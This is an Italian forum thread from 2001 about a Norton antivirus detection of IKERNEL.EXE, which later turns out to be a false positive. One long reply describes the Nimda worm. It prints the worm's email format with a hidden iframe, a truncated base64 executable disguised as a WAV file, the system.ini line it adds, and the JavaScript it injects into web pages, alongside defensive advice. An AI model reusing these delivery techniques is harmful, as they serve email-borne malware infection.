|
|||||||
|
|
|
 |
|
|
Strumenti |
11-12-2001, 22:39
|
#1 |
|
Senior Member
Iscritto dal: Mar 2001
Città: Cremona
Messaggi: 548
|
File affetto da virus messo in quarantena....è un file impor
Norton antivirus 2000 ha rilevato un virus (non maligno) nel file IKERNEL.EXE
Non si ripare e quindi l'ho dovuto mettere in quarantena, così non può essere usato dal sistema e non c'è il pericolo che il virus si diffonda ad altri file. E' un file importante ? A cosa serve ? |
|
|
|
11-12-2001, 22:54
|
#2 |
|
Senior Member
Iscritto dal: Jun 2001
Città: Lazio
Messaggi: 5935
|
io c'è l'ho nel percorso:
C:\Programmi\File comuni\InstallShield\engine\6\Intel 32 non so cosa possa servire però il 6 come directory mi fa pensare a IE6..... Ciao
__________________
HP Gaming 16 I7 10750H, nVidia GTX1650TI 4Gbyte DDR6, 16Gbyte di Ram, SSD INTEL 500Gbyte, Amplificatore Denon PMA-510AE, Diffusori Q Acoustics 3020i |
|
|
|
|
12-12-2001, 20:00
|
#3 | |
|
Senior Member
Iscritto dal: Mar 2001
Città: Cremona
Messaggi: 548
|
Quote:
 Il virus è apparso dopo aver installato IE6 dal CD di PCWorld.....vuoi vedere che è proprio quello che contiene il virus!!!!!Farò uno scan a quel CD Grazie per l'info 
|
|
|
|
|
|
12-12-2001, 20:20
|
#4 |
|
Senior Member
Iscritto dal: Jun 2001
Città: Lazio
Messaggi: 5935
|
Anche io ho installato IE6 da PC-world ma norton 2000 aggiornato non ha trovato niente.......
Ciao
__________________
HP Gaming 16 I7 10750H, nVidia GTX1650TI 4Gbyte DDR6, 16Gbyte di Ram, SSD INTEL 500Gbyte, Amplificatore Denon PMA-510AE, Diffusori Q Acoustics 3020i |
|
|
|
|
12-12-2001, 21:15
|
#5 | |
|
Senior Member
Iscritto dal: Mar 2001
Città: Cremona
Messaggi: 548
|
Quote:
|
|
|
|
|
|
12-12-2001, 21:43
|
#6 |
|
Senior Member
Iscritto dal: Nov 2001
Città: EU
Messaggi: 2991
|
Ci dai per piacere almeno il nome del virus?
InstallShield è un programma per creare i processi d'installazione... |
|
|
|
|
13-12-2001, 12:31
|
#7 | |
|
Senior Member
Iscritto dal: Mar 2001
Città: Cremona
Messaggi: 548
|
Quote:
|
|
|
|
|
|
13-12-2001, 13:15
|
#8 |
|
Senior Member
Iscritto dal: Feb 2001
Messaggi: 467
|
rimuovilo subito!!!!!!!!!!!!
__________________
Membro dal Febbraio 2001 -------------------------------------------------- °o ChAmPagne supernova in the SkY o° |
|
|
|
|
13-12-2001, 13:37
|
#9 | |
|
Senior Member
Iscritto dal: Mar 2001
Città: Cremona
Messaggi: 548
|
Quote:
Motivo ? Non è un file importante ? Vorrei sostituire il file con quello originale, ma non sò da dove si è installato.
|
|
|
|
|
|
13-12-2001, 16:07
|
#10 |
|
Senior Member
Iscritto dal: Nov 2001
Città: EU
Messaggi: 2991
|
NIMDA???? Concordo sul fatto che va immediatamente eliminato!!! NIMDA e’ riuscito in un solo giorno ha balzare in testa alle classifiche mondiali di virus, e secondi i piu' esperti, e' piu' pericoloso di SirCam. Questo worm, attacca solamente i sistemi operativi Windows NT/9x/ME/2000, sfruttando 3 bachi di Outlook Express (fino alla 5.5), Internet Explorer (fino alla 5.0) e IIS (SP 1). Esaminiamo caso per caso: quando il worm attacca Outlook Express (quindi via mail), infetta il sistema, senza che l'allegato sia eseguito! Questo perche' e' sufficiente avere l'anteprima attivata che lui si installa. Per ovviare a questo primo problema, e necessario modificare alcuni parametri di Outlook Express: => lanciate il programma, e selezionate il menu "Strumenti", quindi il comando "Opzioni" e selezionate la scheda "Protezione". Selezionate quindi "Area siti con restrizione" => selezionate il menu "Visualizza", quindi il comando "Layout" e levate qualora fosse presente il segno di spunta dalla voce "Visualizza riquadro di anteprima" Eccovi le propieta' del messaggio: Received: from ... From: <....> Subject: .... MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 Message-Id: ... X-RCPT-TO: ... Date: ... X-UIDL: 285007901 Status: U --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4A tAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW 4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1 TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVOPB G1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAA AMpUCAEAAAB/UEUAAEwBBQB1Oqc7 [....] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA= --====_ABC1234567890DEF_==== Come si può notare la mail segnala ad Outlook la presenza di un file Wav di nome Readme.exe e viene quindi evitata la richiesta di download o apertura del file. Una volta che il vostro pc e' infetto, viene modificato il file system.ini, a cui viene aggiunta la riga: Shell=explorer.exe load.exe -dontrunold Inoltre, in ogni cartella inoltre, vengono creati due possibili file, readme.eml oppure *.nws e/o simili. Vi consiglio comunque di stare attenti ai vari file con estensione .eml e .nws. Altre traccie possono essere rilevate con i seguenti files: load.exe readme.exe mep*.tmp.exe Inoltre potrebbe modificare dei files che sono presenti nella root di Windows come: mmc.exe riched20.dll Una volta infettata una macchina, il verme modifica tutti i files *.asp, *.htm, *.html, index.*, main.* e default.* aggiungendo alla fine degli stessi, le righe: <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> Molti di voi non capiranno questo codice. Questo codice, serve ad aprire una finestrella tra le pagine Web dei siti, contenente il file readme.eml (cioe' quella contenente l'allegato readme.exe che serve per diffondere il virus). Come se non bastasse, modifica o crea se non sono presenti le seguenti chiavi nell'editor di registro (regedit) per nascondere i files creati: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\HideFileExt HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Hidden HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\ShowSuperHidden Per evitare che il virus si diffonda tramite Internet Explorer, dovete modificare le impostazioni di sicurezza. Per farlo seguite questo percorso: lanciate IE, cliccate sul menu "strumenti", quindi sull'opzione "opzioni internet", selezionate la scheda "Protezione", cliccate sul pulsante "Personalizza livello" e dalla nuova finestrella che si aprira', disabilitate gli ActiveX e il download dei files. Il virus comunque puo' infettare Pc collegato ad una rete locale, con Windows 9x/ME Nimda imposta la condivisione di tutte le cartelle senza l'utilizzo di alcuna password. Su Windows NT/2000, addirittura permette agli utentu Guest di avere gli stessi diritti degli amministratori! Attualmente gli unici antivirus in grado di proteggervi da questo virus sono il Norton, il McAfee ed il Pc-Cilin (naturalmente dovete aggiornarli con le ultime firme). Purtroppo pero', tutti i file infetti (quindi se avete un sito, anche tutte le vostre pagine web con estensione asp e html), vengono messi in quarantena o eliminati. Per fortuna pero' esiste un tool che permette il ripristino di questi file (anche se da quello che so, e' molto difficile da usare). Il tool e' scaricabile da questo indirizzo: http://www.tfm.ro/searchreplace/down...rchreplace.zip . Esiste anche una patch per gli amministratori di sistema, ed e' scaricabile da questo indirizzo: http://www.microsoft.com/technet/tre...n/MS01-044.asp Ti consiglio comunque di fare un bel backup dei dati piu' preziosi! Non si sa mai  Per altre informazioni (se queste non ti bastassero) vai sul sito della Symantec: http://securityresponse.symantec.com...yn/24365.html. Ciao ciao |
|
|
|
|
13-12-2001, 16:10
|
#11 |
|
Senior Member
Iscritto dal: Nov 2001
Città: EU
Messaggi: 2991
|
ALTOLA'!!!
FERMA TUTTO!!!!!! Non eliminare quel file!!!! Vai su http://securityresponse.symantec.com...ernel.exe.html!!!!!  accidenti a chi non aggiorna le virus definitions!!!!
|
|
|
|
|
13-12-2001, 20:11
|
#12 | |
|
Senior Member
Iscritto dal: Mar 2001
Città: Cremona
Messaggi: 548
|
Quote:
Una volta ogni tanto sbaglia anche la Symantec 
|
|
|
|
|
|
13-12-2001, 21:37
|
#13 |
|
Senior Member
Iscritto dal: Nov 2001
Città: EU
Messaggi: 2991
|
prego prego
faccio tutto per la patria
|
|
|
|
|
13-12-2001, 22:42
|
#14 | |
|
Senior Member
Iscritto dal: Mar 2001
Città: Cremona
Messaggi: 548
|
Quote:
|
|
|
|
|
|
13-12-2001, 23:01
|
#15 | |
|
Senior Member
Iscritto dal: Nov 2001
Città: EU
Messaggi: 2991
|
Quote:
|
|
|
|
|
|
13-12-2001, 23:35
|
#16 | |
|
Senior Member
Iscritto dal: Mar 2001
Città: Cremona
Messaggi: 548
|
Quote:
|
|
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 17:11.
